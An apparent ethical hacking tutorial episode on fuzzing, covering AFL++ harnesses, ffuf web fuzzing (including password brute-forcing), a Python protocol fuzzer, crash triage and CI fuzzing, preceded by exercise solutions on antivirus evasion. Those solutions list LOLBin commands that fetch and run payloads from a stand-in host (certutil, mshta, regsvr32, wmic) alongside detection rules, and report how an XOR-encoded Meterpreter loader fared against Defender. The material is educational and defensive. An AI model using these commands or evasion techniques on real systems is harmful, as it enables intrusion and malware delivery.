Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

What will I learn

  • What fuzzing is and why it finds bugs that manual testing and code review miss;
  • Types of fuzzing -- dumb fuzzing, smart/grammar-based fuzzing, and coverage-guided fuzzing;
  • AFL++ (American Fuzzy Lop) -- the industry-standard coverage-guided fuzzer;
  • libFuzzer -- in-process fuzzing integrated into the build system;
  • Web application fuzzing -- fuzzing HTTP parameters, headers, and API endpoints with ffuf;
  • Protocol fuzzing -- sending malformed data to network services;
  • Crash analysis and triage -- turning a crash into a vulnerability report;
  • Defense: fuzzing your own software before attackers do, integrating fuzzing into CI/CD.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • GCC or Clang installed (for compiling fuzz targets);
  • AFL++ installed (apt install afl++ on Debian/Ubuntu);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Advanced

Curriculum (of the Learn Ethical Hacking Series):

Learn Ethical Hacking (#64) - Fuzzing - Finding Bugs at Machine Speed

Solutions to Episode 63 Exercises

Exercise 1: Payload encoding evasion test.

Raw msfvenom payload (windows/x64/meterpreter/reverse_tcp):
  Windows Defender: DETECTED (Trojan:Win32/Meterpreter)
  VirusTotal: 52/72 detected

XOR-encoded + custom C loader (xor_encoder.py -> loader.c, compiled with MinGW):
  Windows Defender: NOT DETECTED on initial static scan
  VirusTotal: 8/72 detected (mostly heuristic-only vendors)
  BUT: Defender behavioral engine caught it at RUNTIME when
  shellcode allocated RWX memory and called CreateThread.
  Quarantine time: 4.2 seconds after first thread execution.

Conclusion: XOR encoding bypasses static signature detection on
most engines (8/72 still flagged it) -- but behavioral detection
catches the RWX allocation pattern before the payload accomplishes
anything. Encoding alone is not sufficient against a modern EDR.

The key lesson from this experiment: the detection layer that matters is NOT the signature scanner (layer 1 from episode 63's architecture overview). It is the behavioral engine (layer 3). The XOR encoder changed every byte of the payload, so the hash and byte-pattern signatures no longer matched. But the fundamental BEHAVIOR -- allocate RWX memory, copy bytes into it, execute -- is a pattern that Defender's behavioral engine recognizes regardless of what the bytes themselves contain. This is why professional evasion (as covered in episode 63) combines encoding with anti-behavioral techniques like two-step allocation, indirect syscalls, and process injection into trusted processes.

Exercise 2: LOLBins analysis (five entries from the LOLBAS project).

1. certutil.exe
   Legitimate: certificate management utility
   Abuse: certutil -urlcache -split -f http://evil.com/payload.exe C:\tmp\p.exe
   Detection: process_creation where Image contains "certutil" AND
     CommandLine contains ("urlcache" OR "decode") -- rare in normal ops

2. mshta.exe
   Legitimate: execute HTML Applications (.hta files)
   Abuse: mshta http://evil.com/payload.hta (downloads + executes HTA)
   Detection: mshta.exe with HTTP URL in CommandLine AND
     ParentImage not in expected Office apps (unusual parent)

3. MSBuild.exe
   Legitimate: build .NET projects from .csproj files
   Abuse: inline C# task execution with embedded shellcode loader
   Detection: MSBuild.exe where ParentImage NOT devenv.exe AND
     NOT msbuild pipeline process -- also: short-lived process,
     no actual .csproj file path in CommandLine

4. regsvr32.exe
   Legitimate: register COM DLL objects (regsvr32 /s mylib.dll)
   Abuse: regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll
     loads and executes remote scriptlet -- AppLocker bypass
   Detection: regsvr32.exe where CommandLine contains "/i:http"
     -- the URL argument is essentially never legitimate

5. wmic.exe
   Legitimate: Windows Management Instrumentation query tool
   Abuse: wmic process call create "cmd.exe /c payload.exe"
     OR wmic os get /format:"http://evil.com/xsl.xsl"
   Detection: wmic.exe where CommandLine contains "process call
     create" -- or "os get /format" with a URL

The Sigma-style detection rules for LOLBins share a common pattern: they match the ABUSE syntax specifically, not the binary itself. certutil.exe launched normally for certificate inspection generates zero alerts. certutil.exe with -urlcache -split -f and a URL is something I have never seen in legitimate enterprise operations. The same goes for mshta.exe with an HTTP URL -- legitimate HTA files are local, not remote. The LOLBAS project (lolbas-project.github.io) documents exactly these abuse-vs-legitimate distinctions for 200+ Windows binaries, which is the reference for building detection rules that catch abuse without flooding your SIEM with false positives from legitimate use.

Exercise 3: Staged loader analysis.

Loader chain: xor_encoder.py -> encrypted payload hosted on
  python3 -m http.server 8888 -> staged_loader.py downloads + decrypts + executes

Network indicators an EDR would see:
  - Python process making HTTP request to 127.0.0.1:8888 (unusual)
  - Python process downloading binary data (Content-Type: application/octet-stream)
  - Python process importing ctypes (common, not suspicious alone)

Host-based indicators:
  - Python process calling mmap with PROT_EXEC (rare for Python apps)
  - Memory page with write+exec permissions in python3 address space
  - Unusual memory allocation pattern: mmap -> write -> ctypes cast -> call

Behavioral detections that would trigger:
  - ETW: executable memory page created in Python process
  - Sysmon Event 10 (ProcessAccess) if injecting vs just executing in-place
  - Defender memory scan: shellcode signature in python3 process heap

The staged design is clever in theory -- the encrypted payload never exists on disk, so static scanners see nothing suspicious (a Python script that imports ctypes and requests looks entirely benign). But the runtime execution creates exactly the behavioral signatures that ETW (Event Tracing for Windows, covered in episode 63's defense section) monitors at the kernel level. The mmap(PROT_EXEC) call from Python is particularly unusual -- legitimate Python programs essentially never need executable memory, so any EDR worth deploying will flag it as a high-confidence indicator of in-memory shellcode execution.


Episode 63 was about making payloads that evade antivirus. We covered static detection (signatures, hashes, YARA rules), heuristic detection (suspicious API imports, high entropy), behavioral detection (the sandbox watching what your code DOES, not what it looks like), AMSI for PowerShell, LOLBins for staying off-disk, and the EDR hook architecture that makes all of this work together. The theme across all of it: encoding and obfuscation only buy you time against static analysis. Behavioral detection catches you when you actually do something malicious, regardless of how well-disguised the payload looks.

Today we flip the script completely. Instead of delivering malicious inputs carefully, we deliver malicious inputs AUTOMATICALLY, at machine speed, in volume. We are going to throw millions of garbage inputs at software until it breaks. This is fuzzing, and it has arguably found more vulnerabilities in critical software than any other automated technique.

What Fuzzing Actually Is

Fuzzing is the art of throwing garbage at software until it breaks. Not random garbage -- intelligently mutated garbage that explores code paths the developer never anticipated.

The premise starts from an uncomfortable truth: developers test the happy path. They write unit tests for the expected inputs, integration tests for the expected workflows, and maybe a handful of edge cases they can think of off the top of their head. What they do NOT test is the unhappy universe -- the space of all possible malformed, truncated, oversized, corrupted, and structurally invalid inputs that a real-world attacker (or network blip, or buggy client) might send. That space is effectively infinite, and manual testing covers a vanishingly small fraction of it.

Fuzzers attack that untested space systematically. A fuzzer takes valid inputs (seeds), mutates them in every conceivable way (flip bits, add bytes, remove sections, swap fields, insert null bytes, generate boundary values), and feeds each mutation to the target. It does this thousands of times per second (far more on small, fast targets), around the clock. When the target crashes, hangs, or produces an error it shouldn't -- the fuzzer saves the input that caused it. You then analyze that input to find the underlying bug.

The numbers here are genuinely impressive. Google's OSS-Fuzz -- a continuous fuzzing service for critical open-source software, launched in 2016 -- reported over 10,000 vulnerabilities (plus tens of thousands of other bugs) fixed across 1,000+ projects as of 2023, including OpenSSL, SQLite, curl, libpng, zlib, and hundreds more. Chrome is fuzzed on the same ClusterFuzz infrastructure, and the Linux kernel has its own dedicated fuzzer, syzkaller. These are mature, heavily-reviewed codebases with thousands of developer-hours of testing behind them. Fuzzing found bugs that human review missed entirely -- not because the reviewers were careless, but because the bug-triggering input was something no human tester would ever think to construct.

The reason fuzzing finds what code review misses is structural: code review checks for KNOWN bad patterns. Fuzzing discovers UNKNOWN bad behavior by large-scale automated exploration (not exhaustive, the input space is far too big, but vastly broader than anything a human will try). A reviewer looking at a memcpy call will check if the size parameter looks reasonable in the expected use case. A fuzzer will construct an input that makes the size parameter wrap around to a tiny value when two integers are added together -- an integer overflow that triggers a heap buffer overflow that nobody was checking for.

Three Ways to Fuzz

1. Dumb (mutation-based) fuzzing
   Take valid input, randomly flip bits, add bytes, remove bytes.
   No knowledge of input format. Simple but surprisingly effective
   against parsers and decoders that process raw bytes.
   Example: take a valid PNG, randomly corrupt bytes, feed to
   image parser. PNG parsers have had many bugs found this way.

2. Smart (grammar-based) fuzzing
   Understand the input format. Generate inputs that are STRUCTURALLY
   valid but contain malformed VALUES within valid structures.
   Example: generate valid HTTP requests with overlong headers,
   illegal characters in the method field, or a negative
   Content-Length. The parser gets past the structure check
   and crashes deeper in the logic.

3. Coverage-guided fuzzing (the modern standard)
   Instrument the target binary to report which code paths execute.
   The fuzzer EVOLVES inputs that trigger new code paths.
   If mutation X causes the target to take a branch it has never
   taken before, keep that input and mutate it further.
   If mutation Y covers no new branches, discard it.
   This is evolutionary optimization applied to bug discovery.

Coverage-guided fuzzing is the reason fuzzing went from a useful-but-limited technique to the dominant vulnerability discovery method in modern security research. Dumb fuzzing is effective for simple formats -- it will find crashes in image parsers, audio decoders, and document format handlers relatively quickly. But for complex protocols (TLS, SMB, QUIC) or deeply nested code paths, random mutation will spend 99% of its time on inputs that fail early validation checks and never reach the interesting code. Coverage guidance solves this by treating the fuzzing process as a search problem: find the inputs that explore the most code, then build on those. Over hours and days, a coverage-guided fuzzer accumulates a corpus of inputs that collectively exercises an enormous fraction of the target's code -- far beyond what any manual test suite achieves.
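
To make the feedback loop concrete, here is a toy sketch in Python. Everything in it is made up for illustration: target() stands in for an instrumented binary and simply reports the branch IDs it executed, and the mutator only does single-byte substitutions, which is nothing like the real AFL++ mutators. The point is only the keep-or-discard decision.

```python
def target(data: bytes) -> set:
    """Toy parser: returns the branch IDs it executed, raises on the 'bug'."""
    cov = {0}
    if len(data) >= 1 and data[0] == ord("F"):
        cov.add(1)
        if len(data) >= 2 and data[1] == ord("U"):
            cov.add(2)
            if len(data) >= 3 and data[2] == ord("Z"):
                cov.add(3)
                if len(data) >= 4 and data[3] == ord("Z"):
                    raise RuntimeError("simulated crash")
    return cov


def single_byte_mutations(data: bytes):
    """Yield every input that differs from data in exactly one byte."""
    for pos in range(len(data)):
        for value in range(256):
            if value != data[pos]:
                yield data[:pos] + bytes([value]) + data[pos + 1:]


def coverage_guided_fuzz(seed: bytes, max_execs: int = 100_000):
    """Return (crashing_input_or_None, executions, corpus)."""
    corpus = [seed]
    seen = set(target(seed))  # assumes the seed itself does not crash
    execs = 1
    idx = 0
    while idx < len(corpus) and execs < max_execs:
        for candidate in single_byte_mutations(corpus[idx]):
            execs += 1
            try:
                cov = target(candidate)
            except RuntimeError:
                return candidate, execs, corpus
            if not cov <= seen:           # new branch reached: keep it
                seen |= cov
                corpus.append(candidate)  # and mutate it further later
            # otherwise: no new coverage, discard the candidate
        idx += 1
    return None, execs, corpus


crash, execs, corpus = coverage_guided_fuzz(b"AAAA")
print(crash, execs, corpus)
```

Starting from the seed AAAA, the loop climbs one branch at a time and reaches the crashing input in under 5,000 executions. A blind search over the same four bytes has 256^4 (about 4.3 billion) candidates to get through.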

AFL++: The Industry Standard

AFL++ (American Fuzzy Lop Plus Plus) is the current reference implementation of coverage-guided fuzzing for native code. It instruments target binaries at compile time to inject branch-coverage tracking code, then runs a feedback loop: mutate, execute, check if new branches were covered, keep or discard.

# Step 1: Compile target with AFL instrumentation
afl-gcc -o target_fuzz target.c
# or with Clang (better instrumentation quality):
afl-clang-fast -o target_fuzz target.c

# Step 2: Create seed corpus (start with valid examples)
mkdir input
echo "hello world" > input/seed1.txt
echo "<html><body>test</body></html>" > input/seed2.txt

# Step 3: Run the fuzzer
afl-fuzz -i input -o output -- ./target_fuzz @@
# @@ = AFL replaces this with the path to the mutated input file

# Step 4: Monitor progress (AFL shows a live dashboard)
# Total executions (millions per hour on fast targets)
# Unique crashes found
# Code coverage (paths discovered)
# Current mutation strategy (havoc, splice, deterministic)

# Step 5: Analyze crashes
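ls output/default/crashes/
# (AFL++ 3.0+ writes to output/default/; classic AFL used output/crashes/)
# Each file is the input that caused a crash
# Reproduce: ./target_fuzz output/default/crashes/id:000000,...
# (pass the file as an argument, matching the @@ invocation above)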

The AFL status screen deserves special attention because it tells you whether your fuzzing campaign is actually making progress. Paths discovered is the key metric (labelled "corpus count" in current AFL++ releases, "total paths" in older ones) -- it shows how many inputs with distinct coverage the fuzzer has kept. If this number is growing steadily, the fuzzer is finding new territory to explore and your corpus is accumulating useful seeds. If it plateaus early (say, at 50 paths for a complex parser that clearly has thousands of branches), your seed corpus is probably too narrow and the fuzzer cannot mutate its way past the early validation logic -- add more diverse seeds.

Stability (shown as a percentage) indicates how consistently the target produces the same coverage bitmap for the same input. 100% means deterministic: the same input always hits the same branches. Stability below 85% often indicates multithreading, reads of uninitialized memory, use of randomness, or time-dependent behavior -- situations where the coverage signal is noisy and AFL cannot reliably determine whether a mutation found something new. Fixing stability issues (disabling threading for fuzz targets, seeding random number generators with a fixed value) dramatically improves fuzzing efficiency.

Executions per second varies wildly by target complexity. Simple string parsers run at 200,000-500,000 executions/second. Complex document parsers run at 5,000-50,000. Network protocol code that needs socket setup per iteration might only manage 500. Faster is always better -- more executions per hour means more of the input space explored.
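
If you would rather check these metrics from a script than stare at the dashboard, AFL++ also writes them to a plain-text fuzzer_stats file in the output directory, one "key : value" pair per line. Below is a minimal sketch of reading it. The sample values are invented, the key names are the ones used by recent AFL++ releases (older versions call corpus_count "paths_total" and saved_crashes "unique_crashes"), and the 85% threshold is simply the rule of thumb from above.

```python
# Invented sample in the fuzzer_stats "key : value" layout.
SAMPLE_STATS = """\
execs_done        : 1843200
execs_per_sec     : 5120.00
corpus_count      : 412
stability         : 78.50%
saved_crashes     : 3
"""


def parse_fuzzer_stats(text: str) -> dict:
    """Turn 'key : value' lines into a dict of strings."""
    stats = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            stats[key.strip()] = value.strip()
    return stats


def campaign_warnings(stats: dict, min_stability: float = 85.0) -> list:
    """Flag the problems discussed above; thresholds are rules of thumb."""
    warnings = []
    stability = float(stats.get("stability", "100%").rstrip("%"))
    if stability < min_stability:
        warnings.append(f"stability {stability:.1f}% is below {min_stability:.0f}%")
    if int(stats.get("corpus_count", "0")) == 0:
        warnings.append("no corpus entries recorded")
    return warnings


stats = parse_fuzzer_stats(SAMPLE_STATS)
print(stats["execs_per_sec"], campaign_warnings(stats))
```

In a real campaign you would read the text from output/default/fuzzer_stats instead of the sample string.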

Writing an AFL Fuzz Harness

AFL needs a fuzz harness -- a wrapper program that reads input from a file and passes it to the function you want to test. The quality of the harness determines the quality of the fuzzing campaign. A badly written harness that returns early on most mutations without actually exercising the target code is useless regardless of how many hours you run it.

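// fuzz_harness.c -- wrap a library function for AFL fuzzing
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// The function we want to fuzz (from a library)
extern int parse_config(const char *data, size_t len);

int main(int argc, char **argv) {
    // AFL passes the mutated input file as argv[1] (via @@)
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input-file>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) return 1;

    // Determine the file size; ftell returns -1 on error
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    if (size < 0 || size > 1024 * 1024) { fclose(f); return 1; } // limit input size
    fseek(f, 0, SEEK_SET);

    // Allocate at least 1 byte so an empty input still gets a valid pointer
    char *buf = malloc(size > 0 ? (size_t)size : 1);
    if (!buf) { fclose(f); return 1; }
    size_t nread = fread(buf, 1, (size_t)size, f);
    fclose(f);

    // Call the function under test with exactly the bytes that were read
    parse_config(buf, nread);

    free(buf);
    return 0;
}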
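
Build the harness with sanitizers enabled, then start the fuzzer:

# Compile with sanitizers for much better crash detection
# (-ltarget assumes the code under test is built as libtarget; that library must
#  itself be compiled with afl-clang-fast, or AFL gets no coverage feedback from it)
afl-clang-fast -fsanitize=address,undefined -o fuzz_harness fuzz_harness.c -ltarget
# AddressSanitizer catches: heap/stack/global buffer overflows,
#   use-after-free, and double-free, each with a precise location
# UndefinedBehaviorSanitizer catches: signed integer overflow, null dereference,
#   misaligned memory access, invalid casts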

afl-fuzz -i seeds -o findings -m none -- ./fuzz_harness @@
# -m none: disable memory limit (needed with ASAN overhead)

AddressSanitizer is what transforms "the program crashed" into "the program crashed with a heap buffer overflow at offset 8 beyond a 24-byte allocation in parse_config() at line 142". Without sanitizers, a buffer overflow might not crash at all -- the program just writes past the end of its buffer into adjacent memory and keeps running, producing silent corruption. With ASAN, every out-of-bounds access triggers an immediate crash with a detailed report pinpointing the exact allocation, the access offset, and the full call stack. This makes triage dramatically faster -- you go from "something crashed" to "exploitable heap overflow in config parser" in minutes rather than hours of manual analysis.

Web Application Fuzzing with ffuf

ffuf (Fuzz Faster U Fool) is the closest web counterpart to AFL -- it sends large volumes of HTTP requests, substituting each wordlist entry at the FUZZ keyword, and identifies responses that are different from the baseline. Unlike AFL, ffuf is black-box (no source code needed, no instrumentation) and does not mutate inputs or use coverage feedback; it is built specifically for the HTTP use cases a pentester faces daily.

# Directory fuzzing (find hidden paths)
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt

# Parameter fuzzing (discover hidden GET parameters)
ffuf -u "http://target.com/page?FUZZ=test" -w /usr/share/wordlists/params.txt \
    -fs 4242  # filter responses with this size (baseline size for unknown params)

# POST parameter fuzzing
ffuf -u http://target.com/login -X POST \
    -d "username=admin&password=FUZZ" \
    -w /usr/share/wordlists/rockyou.txt \
    -fc 401  # filter 401 responses (wrong password)

# Header fuzzing (find headers the app responds to differently)
ffuf -u http://target.com/ -H "X-Custom-Header: FUZZ" \
    -w payloads.txt -mc all -fs 0  # match every status code, hide empty (0-byte) responses

# Virtual host discovery (find hosts on shared infrastructure)
ffuf -u http://target.com/ -H "Host: FUZZ.target.com" \
    -w subdomains.txt -fs 4242  # filter the default vhost's response size (measure it first)

# Multi-position fuzzing (username + password simultaneously)
ffuf -u http://target.com/login -X POST \
    -d "username=FUSER&password=FPASS" \
    -w users.txt:FUSER -w passwords.txt:FPASS \
    -fc 401 -mode clusterbomb

The response filtering options are what separate useful ffuf output from noise. Without filtering, every request returns a response and you have to manually inspect thousands of results. The -fc (filter HTTP status code), -fs (filter response size), -fl (filter line count), and -fw (filter word count) flags let you define what "normal" looks like and only show you the anomalies. A parameter that returns a response 200 bytes larger than the baseline is interesting -- it might be an undocumented parameter that does something. A path that returns 200 instead of 404 is interesting -- it exists. A header that changes the response significantly is interesting -- the application is using it for something.
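
The filtering idea itself is simple enough to sketch in a few lines of Python. To be clear, this is not how ffuf is implemented, and the Result type and the sample data are invented for illustration. It only shows the logic: decide what "normal" looks like, then drop everything that matches it.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Result:
    word: str    # the wordlist entry that was substituted for FUZZ
    status: int  # HTTP status code of the response
    size: int    # response body size in bytes


def baseline_size(results) -> int:
    """Guess the 'normal' response size as the most frequent one."""
    return Counter(r.size for r in results).most_common(1)[0][0]


def anomalies(results, filter_status=(), filter_size=()):
    """Drop results matching a filtered status or size (the -fc / -fs idea)."""
    return [r for r in results
            if r.status not in filter_status and r.size not in filter_size]


# Invented results from a parameter-discovery run
results = [
    Result("id", 200, 4242),
    Result("page", 200, 4242),
    Result("debug", 200, 4442),
    Result("q", 200, 4242),
]

normal = baseline_size(results)
for hit in anomalies(results, filter_size=(normal,)):
    print(hit.word, hit.status, hit.size)
```

With the sample data only the "debug" parameter survives the filter, because it is the one response that is 200 bytes larger than the rest.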

Wordlist selection matters enormously. /usr/share/wordlists/dirb/common.txt has ~4,600 entries -- good for a quick check, misses a lot. SecLists (github.com/danielmiessler/SecLists) is the community-maintained reference: hundreds of wordlists covering directory names, parameter names, API paths, subdomains, common credentials, and more. The Discovery/Web-Content/raft-large-words.txt wordlist has 119,600 entries and finds things that the common wordlist misses entirely.

Protocol Fuzzing

Web fuzzing is high-level -- HTTP is a text protocol and ffuf handles the structure automatically. Protocol fuzzing means sending malformed data directly to network services at the binary level, which requires you to implement the mutation logic yourself.

#!/usr/bin/env python3
"""proto_fuzz.py -- basic protocol fuzzer for TCP services"""
import random
import socket
import sys

def generate_mutations(seed_input):
    """Generate mutated versions of valid input."""
    mutations = []

    # Bit flipping: flip one random bit at each byte position
    for i in range(len(seed_input)):
        mutated = bytearray(seed_input)
        mutated[i] ^= 1 << random.randrange(8)
        mutations.append(bytes(mutated))

    # Buffer overflow attempts
    for length in [256, 1024, 4096, 65535]:
        mutations.append(b'A' * length)
        mutations.append(seed_input + b'A' * length)

    # Format string attempts
    for fmt in [b'%s%s%s%s', b'%x%x%x%x', b'%n%n%n%n']:
        mutations.append(fmt * 20)

    # Null bytes, boundary values, special characters
    mutations.append(b'\x00' * 100)
    mutations.append(b'\xff' * 100)
    mutations.append(seed_input.replace(b'\n', b'\r\n\r\n'))

    # Integer boundary values (classic overflow triggers)
    for val in [b'0', b'-1', b'2147483647', b'4294967295', b'-2147483648']:
        mutations.append(val)

    return mutations

def fuzz_service(host, port, seed_input, iterations=1000):
    """Send mutated inputs to a TCP service."""
    crashes = []
    mutations = generate_mutations(seed_input)
    last_sent = None  # most recent input the service actually received

    for i in range(iterations):
        mutation = random.choice(mutations)
        try:
            # "with" closes the socket on every path, including errors
            with socket.create_connection((host, port), timeout=3) as s:
                s.sendall(mutation)
                last_sent = mutation
                try:
                    s.recv(4096)
                except socket.timeout:
                    pass  # no reply is fine; the service may just be slow
        except ConnectionRefusedError:
            # The port stopped accepting connections, so the PREVIOUS input
            # (the last one delivered) is the likely culprit, not this one.
            print(f"[!] Service stopped accepting connections at iteration {i}!")
            if last_sent is not None:
                crashes.append(last_sent)
            break
        except OSError:
            continue  # resets and connect timeouts: keep fuzzing

    return crashes

if __name__ == '__main__':
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} HOST PORT [SEED]")
    host = sys.argv[1]
    port = int(sys.argv[2])
    seed = sys.argv[3].encode() if len(sys.argv) > 3 else b'GET / HTTP/1.0\r\n\r\n'
    crashes = fuzz_service(host, port, seed)
    print(f"\n{len(crashes)} crashes found")
    for c in crashes:
        print(f"  Crash input ({len(c)} bytes): {c[:100]}")

The integer boundary values deserve specific emphasis. Many crashes in network services come from integer overflows -- the server reads a length field from the packet, performs arithmetic on it (maybe multiplying by an element size, or adding to a base offset), and the result wraps around to a small or negative value. The attacker sends an element count of 1073741825 (0x40000001), the server computes 1073741825 * 4 for 4-byte elements and gets 4 due to 32-bit overflow, allocates a tiny buffer, then copies the full 4GB of "data" into it. Classic heap overflow. Addition wraps the same way: length=4294967295 plus a 1-byte terminator comes out as 0. Testing with boundary values (INT_MAX, UINT_MAX, 0, -1) catches a surprising number of these without needing deep coverage guidance.
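
The wraparound is easy to check by hand. Here is a small Python sketch that mimics what a C program computes when the size is held in a uint32_t (Python integers do not overflow, so the mask does the truncation). The function names are made up for this example.

```python
MASK32 = 0xFFFFFFFF  # largest value a 32-bit unsigned integer can hold


def alloc_size_32(count: int, elem_size: int, header: int = 0) -> int:
    """Size as computed in uint32_t arithmetic: count * elem_size + header."""
    return (count * elem_size + header) & MASK32


def overflows_32(count: int, elem_size: int, header: int = 0) -> bool:
    """The check the server should have made before allocating."""
    return count * elem_size + header > MASK32


# 0x40000001 four-byte elements: the true size is 4 GiB + 4 bytes,
# but the 32-bit result is only 4 bytes.
print(alloc_size_32(0x40000001, 4), overflows_32(0x40000001, 4))

# UINT_MAX bytes plus a 1-byte terminator wraps to 0.
print(alloc_size_32(0xFFFFFFFF, 1, header=1), overflows_32(0xFFFFFFFF, 1, header=1))

# A sane request passes through unchanged.
print(alloc_size_32(100, 4), overflows_32(100, 4))
```

The fix on the server side is the overflows_32 idea: validate the length field against the maximum representable size before doing the multiplication, not after.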

Crash Triage

When AFL (or your protocol fuzzer) finds a crash, you have a starting point -- not a finished finding. Crash triage is the process of turning "the program crashed with this input" into a vulnerability assessment.

# When AFL finds crashes (AFL++ 3.0+ stores them in output/default/crashes/):

# 1. Reproduce the crash (pass the file as an argument, as afl-fuzz did via @@)
./target_fuzz output/default/crashes/id:000000,sig:11,src:000001,op:havoc,rep:2
# sig:11 = SIGSEGV (segmentation fault)
# sig:6  = SIGABRT (assertion failure, often ASAN or abort())
# sig:8  = SIGFPE  (floating point exception, often integer divide by zero)

# 2. Get crash details with GDB (for binaries WITHOUT ASAN)
gdb -batch -ex run -ex bt -ex quit --args ./target_fuzz output/default/crashes/id:000000,...
# Backtrace shows WHERE the crash occurred

# 3. Detailed ASAN report (compile with -fsanitize=address first)
./target_fuzz_asan output/default/crashes/id:000000,...
# ASAN output example:
# ==1234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x...
# READ of size 4 at 0x... thread T0
# #0 in parse_config() config_parser.c:142
# #1 in main() harness.c:28
# Shadow bytes around the buggy address: (shows heap layout)

# 4. Assess exploitability
# Stack buffer overflow:    high -- typically RCE via return address overwrite
# Heap buffer overflow:     medium-high -- exploitability depends on heap layout
# Use-after-free:           high -- often leads to type confusion, code exec
# Null pointer dereference: low -- typically DoS only on modern systems
# Integer overflow:         depends -- if it leads to buffer overflow, high

# 5. Minimize the crash input (smaller = easier to analyze)
afl-tmin -i output/default/crashes/id:000000,... -o minimized.txt -- ./target_fuzz @@
# Removes bytes that are not necessary to trigger the crash
# A 4096-byte crash input often minimizes to 12 bytes

The signal that killed the process is your first triage clue. SIGSEGV means the program tried to access memory it should not -- either a null pointer dereference (address near 0x0) or an out-of-bounds access to a valid-ish address. SIGABRT usually means an assertion failure or an abort() call triggered by ASAN or a CHECK() macro inside the target -- look at the abort message. SIGFPE, despite the name, almost always means an integer divide-by-zero (or INT_MIN / -1 on x86) rather than anything to do with floating point.
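
With dozens of crash files, sorting them by signal is a quick first pass. The sketch below pulls the signal out of an AFL-style crash file name. The helper names are my own, and the signal numbers are the Linux ones; other platforms may number them differently.

```python
# Linux signal numbers most often seen in fuzzing crashes
SIGNALS = {4: "SIGILL", 6: "SIGABRT", 8: "SIGFPE", 11: "SIGSEGV"}


def parse_crash_name(name: str) -> dict:
    """Split 'id:000000,sig:11,src:000001,...' into a dict of fields."""
    fields = {}
    for part in name.split(","):
        key, sep, value = part.partition(":")
        if sep:  # skip tokens without a colon, such as '+cov'
            fields[key] = value
    return fields


def crash_signal(name: str) -> str:
    """Return the signal name encoded in a crash file name."""
    sig = parse_crash_name(name).get("sig")
    if sig is None:
        return "unknown"
    return SIGNALS.get(int(sig), f"signal {int(sig)}")


example = "id:000000,sig:11,src:000001,op:havoc,rep:2"
print(crash_signal(example), parse_crash_name(example))
```

Grouping by signal is only a rough bucket. Two SIGSEGV files can be the same bug or completely unrelated ones, so the ASAN report and the backtrace still decide what is actually unique.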

The ASAN output is far more useful than a raw GDB backtrace. Where GDB tells you "it crashed at address 0x7fff..." (and you have to figure out why), ASAN tells you "heap-buffer-overflow: READ of size 4, 8 bytes beyond a 24-byte allocation". That narrows the bug immediately: there is a 24-byte allocation somewhere (you can find the allocation site in the ASAN output), and code is reading 4 bytes starting at offset 32 -- 8 bytes past the end. Find the allocation, find the code that reads past it, and you have the vulnerability.

Input minimization with afl-tmin is underrated. AFL's crash inputs are often large (the mutations that found the crash may have required specific bytes scattered across a kilobyte of data). afl-tmin removes blocks of bytes, starting with large blocks and working down to small ones, re-running the target after each removal to see if the crash still occurs. The result is a much smaller input that still triggers the bug -- which makes manual analysis much easier. Fewer bytes = cleaner understanding of what the parser is mishandling.
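
The core idea fits in a dozen lines. The following is a toy minimizer, not afl-tmin's actual algorithm: it tries to delete chunks of shrinking size (down to single bytes) and keeps a deletion whenever the crash still reproduces. The still_crashes callback is an assumption standing in for "run the target on this input and see if it dies".

```python
def minimize(data: bytes, still_crashes) -> bytes:
    """Shrink data while still_crashes(data) stays True."""
    assert still_crashes(data), "start from an input that actually crashes"
    block = max(len(data) // 2, 1)
    while block >= 1:
        pos = 0
        while pos < len(data):
            candidate = data[:pos] + data[pos + block:]
            if still_crashes(candidate):
                data = candidate  # chunk was irrelevant, drop it
            else:
                pos += block      # chunk is needed, move past it
        block //= 2               # retry with smaller chunks
    return data


def toy_crashes(data: bytes) -> bool:
    """Stand-in for the real target: 'crashes' on the bytes FF FE."""
    return b"\xff\xfe" in data


big_input = b"A" * 50 + b"\xff\xfe" + b"B" * 50
small_input = minimize(big_input, toy_crashes)
print(len(big_input), "->", len(small_input), small_input)
```

For the toy predicate the 102-byte input shrinks to just the two trigger bytes. Real targets are slower and messier, which is why the real tool is worth using instead of a script like this.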

Defense: Fuzz Before Attackers Do

The offensive perspective on fuzzing is finding bugs in OTHER people's software. The defensive perspective is finding bugs in YOUR software before the attacker does. The same tools, completely different target.

# Integrate fuzzing into CI/CD:

# 1. OSS-Fuzz (for open-source projects -- free)
# Google runs fuzzers continuously on your project at Google scale
# Requirements: write a fuzz target, add build scripts, submit to OSS-Fuzz
# Results: bugs reported privately with 90-day disclosure deadline
# https://github.com/google/oss-fuzz

# 2. ClusterFuzzLite (GitHub Actions integration)
# Same engines as OSS-Fuzz but runs in your own CI pipeline
# No Google account needed, runs on your infrastructure
# https://google.github.io/clusterfuzzlite/

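# Example GitHub Actions workflow for continuous fuzzing:
# name: Fuzz
# on:
#   push:
#   pull_request:
#   schedule:
#     - cron: "0 3 * * *"   # schedule needs a cron expression (here: nightly)
# jobs:
#   fuzz:
#     runs-on: ubuntu-latest
#     env:
#       AFL_SKIP_CPUFREQ: "1"                        # CI runners cannot tune the CPU governor
#       AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES: "1"   # ...or change core_pattern
#     steps:
#       - uses: actions/checkout@v3
#       - name: Restore corpus from earlier runs (saved again when the job succeeds)
#         uses: actions/cache@v3
#         with:
#           path: corpus
#           key: fuzz-corpus-${{ github.sha }}
#           restore-keys: fuzz-corpus-
#       - name: Install AFL++
#         run: sudo apt-get update && sudo apt-get install -y afl++
#       - name: Build fuzz targets
#         run: afl-clang-fast -fsanitize=address -o fuzz_target fuzz_harness.c
#       - name: Run fuzzer (1 hour per run)
#         run: |
#           afl-fuzz -i corpus -o findings -V 3600 -- ./fuzz_target @@
#       - name: Merge new queue entries into the cached corpus
#         run: cp findings/default/queue/id* corpus/ 2>/dev/null || true
#       - name: Check for crashes
#         run: |
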